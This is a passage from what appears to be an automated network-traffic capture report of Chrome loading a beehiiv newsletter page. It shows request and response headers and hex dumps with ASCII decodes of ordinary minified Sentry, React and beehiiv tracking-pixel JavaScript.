                                                                                                                                            Data Ascii: :return F(t,Error)}}function k(t,e){return Et.call(t)===`[object ${e}]`}function cn(t){return k(t,"ErrorEvent")}function un(t){return k(t,"DOMError")}function fn(t){return k(t,"DOMException")}function U(t){return k(t,"String")}function Pt(t){return typeof
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2c 65 2c 6e 29 7b 63 6f 6e 73 74 20 72 3d 67 2c 73 3d 72 2e 5f 5f 53 45 4e 54 52 59 5f 5f 3d 72 2e 5f 5f 53 45 4e 54 52 59 5f 5f 7c 7c 7b 7d 2c 69 3d 73 5b 77 5d 3d 73 5b 77 5d 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 69 5b 74 5d 7c 7c 28 69 5b 74 5d 3d 65 28 29 29 7d 63 6f 6e 73 74 20 43 3d 67 2c 47 74 3d 38 30 3b 66 75 6e 63 74 69 6f 6e 20 24 74 28 74 2c 65 3d 7b 7d 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 3b 74 72 79 7b 6c 65 74 20 6e 3d 74 3b 63 6f 6e 73 74 20 72 3d 35 2c 73 3d 5b 5d 3b 6c 65 74 20 69 3d 30 2c 6f 3d 30 3b 63 6f 6e 73 74 20 61 3d 22 20 3e 20 22 2c 63 3d 61 2e 6c 65 6e 67 74 68 3b 6c 65 74 20 75 3b 63 6f 6e 73 74 20 64 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3a 65 2e 6b 65 79 41 74 74 72 73
                                                                                                                                            Data Ascii: ,e,n){const r=g,s=r.__SENTRY__=r.__SENTRY__||{},i=s[w]=s[w]||{};return i[t]||(i[t]=e())}const C=g,Gt=80;function $t(t,e={}){if(!t)return"<unknown>";try{let n=t;const r=5,s=[];let i=0,o=0;const a=" > ",c=a.length;let u;const d=Array.isArray(e)?e:e.keyAttrs
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 66 6f 72 28 6c 65 74 20 72 3d 30 3b 72 3c 6e 3b 72 2b 2b 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 7b 69 66 28 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 43 6f 6d 70 6f 6e 65 6e 74 29 72 65 74 75 72 6e 20 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 43 6f 6d 70 6f 6e 65 6e 74 3b 69 66 28 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 45 6c 65 6d 65 6e 74 29 72 65 74 75 72 6e 20 65 2e 64 61 74 61 73 65 74 2e 73 65 6e 74 72 79 45 6c 65 6d 65 6e 74 7d 65 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 63 6f 6e 73 74 20 58 3d 74 79 70 65 6f 66 20 5f 5f 53 45 4e 54 52 59 5f 44 45 42 55 47 5f 5f 3e 22 75 22 7c 7c 5f 5f 53
                                                                                                                                            Data Ascii: for(let r=0;r<n;r++){if(!e)return null;if(e instanceof HTMLElement){if(e.dataset.sentryComponent)return e.dataset.sentryComponent;if(e.dataset.sentryElement)return e.dataset.sentryElement}e=e.parentNode}return null}const X=typeof __SENTRY_DEBUG__>"u"||__S
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 29 7b 63 6f 6e 73 74 20 65 3d 7b 74 79 70 65 3a 74 2e 74 79 70 65 2c 74 61 72 67 65 74 3a 61 74 28 74 2e 74 61 72 67 65 74 29 2c 63 75 72 72 65 6e 74 54 61 72 67 65 74 3a 61 74 28 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 2e 2e 2e 63 74 28 74 29 7d 3b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 43 75 73 74 6f 6d 45 76 65 6e 74 3c 22 75 22 26 26 46 28 74 2c 43 75 73 74 6f 6d 45 76 65 6e 74 29 26 26 28 65 2e 64 65 74 61 69 6c 3d 74 2e 64 65 74 61 69 6c 29 2c 65 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 4c 74 28 74 29 3f 24 74 28 74 29 3a 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 7d 63 61 74 63 68 7b 72 65 74 75 72
                                                                                                                                            Data Ascii: ){const e={type:t.type,target:at(t.target),currentTarget:at(t.currentTarget),...ct(t)};return typeof CustomEvent<"u"&&F(t,CustomEvent)&&(e.detail=t.detail),e}else return t}function at(t){try{return Lt(t)?$t(t):Object.prototype.toString.call(t)}catch{retur
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 63 6f 6e 74 69 6e 75 65 3b 63 6f 6e 73 74 20 75 3d 75 74 2e 74 65 73 74 28 63 29 3f 63 2e 72 65 70 6c 61 63 65 28 75 74 2c 22 24 31 22 29 3a 63 3b 69 66 28 21 75 2e 6d 61 74 63 68 28 2f 5c 53 2a 45 72 72 6f 72 3a 20 2f 29 29 7b 66 6f 72 28 63 6f 6e 73 74 20 64 20 6f 66 20 65 29 7b 63 6f 6e 73 74 20 66 3d 64 28 75 29 3b 69 66 28 66 29 7b 69 2e 70 75 73 68 28 66 29 3b 62 72 65 61 6b 7d 7d 69 66 28 69 2e 6c 65 6e 67 74 68 3e 3d 54 74 2b 73 29 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 56 74 28 69 2e 73 6c 69 63 65 28 73 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 6e 28 74 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 3f 4b 74 28 2e 2e 2e 74 29 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 56 74 28 74 29 7b 69 66 28 21 74 2e 6c 65 6e 67 74 68
                                                                                                                                            Data Ascii: continue;const u=ut.test(c)?c.replace(ut,"$1"):c;if(!u.match(/\S*Error: /)){for(const d of e){const f=d(u);if(f){i.push(f);break}}if(i.length>=Tt+s)break}}return Vt(i.slice(s))}}function bn(t){return Array.isArray(t)?Kt(...t):t}function Vt(t){if(!t.length
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 74 75 72 6e 20 65 2e 68 61 73 28 73 29 3f 21 30 3a 28 65 2e 61 64 64 28 73 29 2c 21 31 29 3b 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 69 66 28 65 5b 69 5d 3d 3d 3d 73 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 73 29 2c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 72 28 73 29 7b 69 66 28 74 29 65 2e 64 65 6c 65 74 65 28 73 29 3b 65 6c 73 65 20 66 6f 72 28 6c 65 74 20 69 3d 30 3b 69 3c 65 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 69 66 28 65 5b 69 5d 3d 3d 3d 73 29 7b 65 2e 73 70 6c 69 63 65 28 69 2c 31 29 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 5b 6e 2c 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 63 6f 6e 73 74 20 74 3d 67 2c 65 3d 74 2e 63 72 79 70 74 6f 7c 7c 74 2e 6d 73 43 72 79 70 74 6f 3b 6c
                                                                                                                                            Data Ascii: turn e.has(s)?!0:(e.add(s),!1);for(let i=0;i<e.length;i++)if(e[i]===s)return!0;return e.push(s),!1}function r(s){if(t)e.delete(s);else for(let i=0;i<e.length;i++)if(e[i]===s){e.splice(i,1);break}}return[n,r]}function p(){const t=g,e=t.crypto||t.msCrypto;l
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 74 2c 65 3d 33 2c 6e 3d 31 30 30 2a 31 30 32 34 29 7b 63 6f 6e 73 74 20 72 3d 54 28 74 2c 65 29 3b 72 65 74 75 72 6e 20 69 65 28 72 29 3e 6e 3f 65 65 28 74 2c 65 2d 31 2c 6e 29 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 2c 65 2c 6e 3d 31 2f 30 2c 72 3d 31 2f 30 2c 73 3d 5a 74 28 29 29 7b 63 6f 6e 73 74 5b 69 2c 6f 5d 3d 73 3b 69 66 28 65 3d 3d 6e 75 6c 6c 7c 7c 5b 22 6e 75 6d 62 65 72 22 2c 22 62 6f 6f 6c 65 61 6e 22 2c 22 73 74 72 69 6e 67 22 5d 2e 69 6e 63 6c 75 64 65 73 28 74 79 70 65 6f 66 20 65 29 26 26 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 65 29 29 72 65 74 75 72 6e 20 65 3b 63 6f 6e 73 74 20 61 3d 6e 65 28 74 2c 65 29 3b 69 66 28 21 61 2e 73 74 61 72 74 73 57 69 74 68 28 22 5b 6f 62 6a 65 63 74 20 22 29
                                                                                                                                            Data Ascii: }function ee(t,e=3,n=100*1024){const r=T(t,e);return ie(r)>n?ee(t,e-1,n):r}function H(t,e,n=1/0,r=1/0,s=Zt()){const[i,o]=s;if(e==null||["number","boolean","string"].includes(typeof e)&&!Number.isNaN(e))return e;const a=ne(t,e);if(!a.startsWith("[object ")
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 65 74 75 72 6e 2f 5e 48 54 4d 4c 28 5c 77 2a 29 45 6c 65 6d 65 6e 74 24 2f 2e 74 65 73 74 28 6e 29 3f 60 5b 48 54 4d 4c 45 6c 65 6d 65 6e 74 3a 20 24 7b 6e 7d 5d 60 3a 60 5b 6f 62 6a 65 63 74 20 24 7b 6e 7d 5d 60 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 60 2a 2a 6e 6f 6e 2d 73 65 72 69 61 6c 69 7a 61 62 6c 65 2a 2a 20 28 24 7b 6e 7d 29 60 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 74 29 7b 63 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 3a 22 6e 75 6c 6c 20 70 72 6f 74 6f 74 79 70 65 22 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 74 29 7b 72 65 74 75 72 6e 7e 2d 65 6e 63 6f 64 65 55 52 49 28 74 29 2e 73 70 6c 69 74 28 2f 25
                                                                                                                                            Data Ascii: eturn/^HTML(\w*)Element$/.test(n)?`[HTMLElement: ${n}]`:`[object ${n}]`}catch(n){return`**non-serializable** (${n})`}}function re(t){const e=Object.getPrototypeOf(t);return e?e.constructor.name:"null prototype"}function se(t){return~-encodeURI(t).split(/%
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2e 5f 76 61 6c 75 65 3d 6e 2c 74 68 69 73 2e 5f 65 78 65 63 75 74 65 48 61 6e 64 6c 65 72 73 28 29 7d 7d 7d 5f 5f 69 6e 69 74 34 28 29 7b 74 68 69 73 2e 5f 65 78 65 63 75 74 65 48 61 6e 64 6c 65 72 73 3d 28 29 3d 3e 7b 69 66 28 74 68 69 73 2e 5f 73 74 61 74 65 3d 3d 3d 79 2e 50 45 4e 44 49 4e 47 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 73 2e 73 6c 69 63 65 28 29 3b 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 73 3d 5b 5d 2c 65 2e 66 6f 72 45 61 63 68 28 6e 3d 3e 7b 6e 5b 30 5d 7c 7c 28 74 68 69 73 2e 5f 73 74 61 74 65 3d 3d 3d 79 2e 52 45 53 4f 4c 56 45 44 26 26 6e 5b 31 5d 28 74 68 69 73 2e 5f 76 61 6c 75 65 29 2c 74 68 69 73 2e 5f 73 74 61 74 65 3d 3d 3d 79 2e 52 45 4a 45 43 54 45 44 26 26 6e 5b 32 5d 28 74 68 69
                                                                                                                                            Data Ascii: ._value=n,this._executeHandlers()}}}__init4(){this._executeHandlers=()=>{if(this._state===y.PENDING)return;const e=this._handlers.slice();this._handlers=[],e.forEach(n=>{n[0]||(this._state===y.RESOLVED&&n[1](this._value),this._state===y.REJECTED&&n[2](thi


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.164972716.15.184.1744436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC380OUTGET /pixel-js.js HTTP/1.1
                                                                                                                                            Host: beehiiv-adnetwork-production.s3.amazonaws.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:33 UTC492INHTTP/1.1 200 OK
                                                                                                                                            x-amz-id-2: gd3iK0sug1231dGi5FtSUIr7z1uCqyhdu26QIc7E4KO7G3hv/VKgk4zXQrKUd4XjV7sCNrTocT6031hBXEo3DrXeTtm+YsdY
                                                                                                                                            x-amz-request-id: FMGNKYZ3E79CKW25
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Last-Modified: Tue, 14 Jan 2025 21:36:24 GMT
                                                                                                                                            ETag: "c0e127164e594201e27bf23c83596835"
                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                            x-amz-version-id: DC.LDwZ74kg3aPa9nJ0RfCCkAkac1qzD
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Type: text/javascript
                                                                                                                                            Content-Length: 8364
                                                                                                                                            Server: AmazonS3
                                                                                                                                            Connection: close
                                                                                                                                            2025-01-15 18:14:33 UTC8364INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 6c 65 74 20 6c 6f 67 20 3d 20 28 29 20 3d 3e 20 7b 0a 20 20 7d 3b 0a 20 20 63 6f 6e 73 74 20 41 50 49 41 52 59 5f 45 4e 44 50 4f 49 4e 54 20 3d 20 22 68 74 74 70 73 3a 2f 2f 69 6e 67 65 73 74 69 6f 6e 2e 61 70 69 61 72 79 2e 62 65 65 68 69 69 76 2e 6e 65 74 2f 61 70 69 2f 76 31 2f 69 6e 67 65 73 74 69 6f 6e 2f 70 69 78 65 6c 22 3b 0a 20 20 63 6f 6e 73 74 20 41 44 4e 45 54 57 4f 52 4b 5f 45 4e 44 50 4f 49 4e 54 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 64 6e 65 74 77 6f 72 6b 2e 62 65 65 68 69 69 76 2e 63 6f 6d 22 3b 0a 20 20 6c 65 74 20 69 73 53 65 63 75 72 65 20 3d 20 74 72 75 65 3b 0a 20 20 69 66 20 28 41 50 49 41 52 59 5f 45 4e 44 50 4f 49 4e 54 2e 69 6e 63 6c 75 64 65 73 28 22 64 65 76 22 29 29 20 7b 0a 20
                                                                                                                                            Data Ascii: (function() { let log = () => { }; const APIARY_ENDPOINT = "https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixel"; const ADNETWORK_ENDPOINT = "https://adnetwork.beehiiv.com"; let isSecure = true; if (APIARY_ENDPOINT.includes("dev")) {


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.1649731104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC550OUTGET /assets/index-D6da9p6-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC899INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 64195
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"fac3-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89a1d8642fd-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC470INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 37 61 30 62 34 36 63 2d 63 36 65 32 2d 35 34 35 62 2d 61 31 65 35 2d 66 34 65 36 64 62 66 36 64 35 65 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f7a0b46c-c6e2-545b-a1e5-f4e6dbf6d5e1")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 65 50 72 6f 70 65 72 74 79 28 65 2c 61 2c 6c 2e 67 65 74 3f 6c 3a 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 28 29 3d 3e 6e 5b 61 5d 7d 29 7d 7d 7d 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 29 7d 76 61 72 20 44 61 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3c 22 75 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3c 22 75 22 3f 77 69 6e 64 6f 77 3a 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3c 22 75 22 3f 67 6c 6f 62 61 6c 3a 74 79 70 65 6f 66 20 73 65 6c 66 3c 22 75 22 3f 73 65 6c 66 3a 7b 7d 3b 66 75 6e 63
                                                                                                                                            Data Ascii: eProperty(e,a,l.get?l:{enumerable:!0,get:()=>n[a]})}}}return Object.freeze(Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}))}var Da=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};func
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6e 65 6e 74 3d 7b 7d 3b 55 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 53 74 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 65 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 65 21 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 74 61 6b 65 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 20 74 6f 20 75 70 64 61 74 65 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 20 77 68 69 63 68 20 72 65 74 75 72 6e 73 20 61 6e 20 6f 62 6a 65 63 74 20 6f 66 20 73 74 61 74 65 20 76 61 72 69 61 62 6c 65 73 2e 22 29 3b 74 68 69 73 2e 75 70 64 61 74 65 72 2e 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 28 74 68 69 73 2c 65 2c 74 2c 22 73
                                                                                                                                            Data Ascii: nent={};Ue.prototype.setState=function(e,t){if(typeof e!="object"&&typeof e!="function"&&e!=null)throw Error("takes an object of state variables to update or a function which returns an object of state variables.");this.updater.enqueueSetState(this,e,t,"s
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 65 2e 73 74 61 74 75 73 3d 3d 3d 22 70 65 6e 64 69 6e 67 22 26 26 28 65 2e 73 74 61 74 75 73 3d 22 72 65 6a 65 63 74 65 64 22 2c 65 2e 72 65 61 73 6f 6e 3d 74 29 7d 29 29 2c 65 2e 73 74 61 74 75 73 29 7b 63 61 73 65 22 66 75 6c 66 69 6c 6c 65 64 22 3a 72 65 74 75 72 6e 20 65 2e 76 61 6c 75 65 3b 63 61 73 65 22 72 65 6a 65 63 74 65 64 22 3a 74 68 72 6f 77 20 65 2e 72 65 61 73 6f 6e 7d 7d 74 68 72 6f 77 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6a 65 28 65 2c 74 2c 72 2c 6e 2c 61 29 7b 76 61 72 20 6c 3d 74 79 70 65 6f 66 20 65 3b 28 6c 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 6c 3d 3d 3d 22 62 6f 6f 6c 65 61 6e 22 29 26 26 28 65 3d 6e 75 6c 6c 29 3b 76 61 72 20 6f 3d 21 31 3b 69 66 28 65 3d 3d 3d 6e 75 6c 6c 29 6f 3d 21 30 3b 65 6c 73 65 20 73 77 69 74 63
                                                                                                                                            Data Ascii: e.status==="pending"&&(e.status="rejected",e.reason=t)})),e.status){case"fulfilled":return e.value;case"rejected":throw e.reason}}throw e}function je(e,t,r,n,a){var l=typeof e;(l==="undefined"||l==="boolean")&&(e=null);var o=!1;if(e===null)o=!0;else switc
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 69 6f 6e 28 72 29 7b 28 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 30 7c 7c 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 2d 31 29 26 26 28 65 2e 5f 73 74 61 74 75 73 3d 31 2c 65 2e 5f 72 65 73 75 6c 74 3d 72 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 30 7c 7c 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 2d 31 29 26 26 28 65 2e 5f 73 74 61 74 75 73 3d 32 2c 65 2e 5f 72 65 73 75 6c 74 3d 72 29 7d 29 2c 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 2d 31 26 26 28 65 2e 5f 73 74 61 74 75 73 3d 30 2c 65 2e 5f 72 65 73 75 6c 74 3d 74 29 7d 69 66 28 65 2e 5f 73 74 61 74 75 73 3d 3d 3d 31 29 72 65 74 75 72 6e 20 65 2e 5f 72 65 73 75 6c 74 2e 64 65 66 61 75 6c 74 3b 74 68 72 6f 77 20 65 2e 5f 72 65 73 75 6c 74 7d 76 61 72 20 58 74 3d 74 79 70 65 6f 66 20 72
                                                                                                                                            Data Ascii: ion(r){(e._status===0||e._status===-1)&&(e._status=1,e._result=r)},function(r){(e._status===0||e._status===-1)&&(e._status=2,e._result=r)}),e._status===-1&&(e._status=0,e._result=t)}if(e._status===1)return e._result.default;throw e._result}var Xt=typeof r
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 69 66 28 65 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 68 65 20 61 72 67 75 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 61 20 52 65 61 63 74 20 65 6c 65 6d 65 6e 74 2c 20 62 75 74 20 79 6f 75 20 70 61 73 73 65 64 20 22 2b 65 2b 22 2e 22 29 3b 76 61 72 20 6e 3d 67 72 28 7b 7d 2c 65 2e 70 72 6f 70 73 29 2c 61 3d 65 2e 6b 65 79 2c 6c 3d 76 6f 69 64 20 30 3b 69 66 28 74 21 3d 6e 75 6c 6c 29 66 6f 72 28 6f 20 69 6e 20 74 2e 72 65 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 6c 3d 76 6f 69 64 20 30 29 2c 74 2e 6b 65 79 21 3d 3d 76 6f 69 64 20 30 26 26 28 61 3d 22 22 2b 74 2e 6b 65 79 29 2c 74 29 21 45 72 2e 63 61 6c 6c 28 74 2c 6f 29 7c 7c 6f 3d 3d 3d 22 6b 65 79 22 7c 7c 6f 3d 3d 3d
                                                                                                                                            Data Ascii: lement=function(e,t,r){if(e==null)throw Error("The argument must be a React element, but you passed "+e+".");var n=gr({},e.props),a=e.key,l=void 0;if(t!=null)for(o in t.ref!==void 0&&(l=void 0),t.key!==void 0&&(a=""+t.key),t)!Er.call(t,o)||o==="key"||o===
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 2e 54 2c 72 3d 7b 7d 3b 46 2e 54 3d 72 3b 74 72 79 7b 76 61 72 20 6e 3d 65 28 29 2c 61 3d 46 2e 53 3b 61 21 3d 3d 6e 75 6c 6c 26 26 61 28 72 2c 6e 29 2c 74 79 70 65 6f 66 20 6e 3d 3d 22 6f 62 6a 65 63 74 22 26 26 6e 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 6e 2e 74 68 65 6e 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 6e 2e 74 68 65 6e 28 70 6e 2c 58 74 29 7d 63 61 74 63 68 28 6c 29 7b 58 74 28 6c 29 7d 66 69 6e 61 6c 6c 79 7b 46 2e 54 3d 74 7d 7d 3b 4c 2e 75 6e 73 74 61 62 6c 65 5f 75 73 65 43 61 63 68 65 52 65 66 72 65 73 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 2e 48 2e 75 73 65 43 61 63 68 65 52 65 66 72 65 73 68 28 29 7d 3b 4c 2e 75 73 65 3d 66 75 6e 63 74 69 6f
                                                                                                                                            Data Ascii: n=function(e){var t=F.T,r={};F.T=r;try{var n=e(),a=F.S;a!==null&&a(r,n),typeof n=="object"&&n!==null&&typeof n.then=="function"&&n.then(pn,Xt)}catch(l){Xt(l)}finally{F.T=t}};L.unstable_useCacheRefresh=function(){return F.H.useCacheRefresh()};L.use=functio
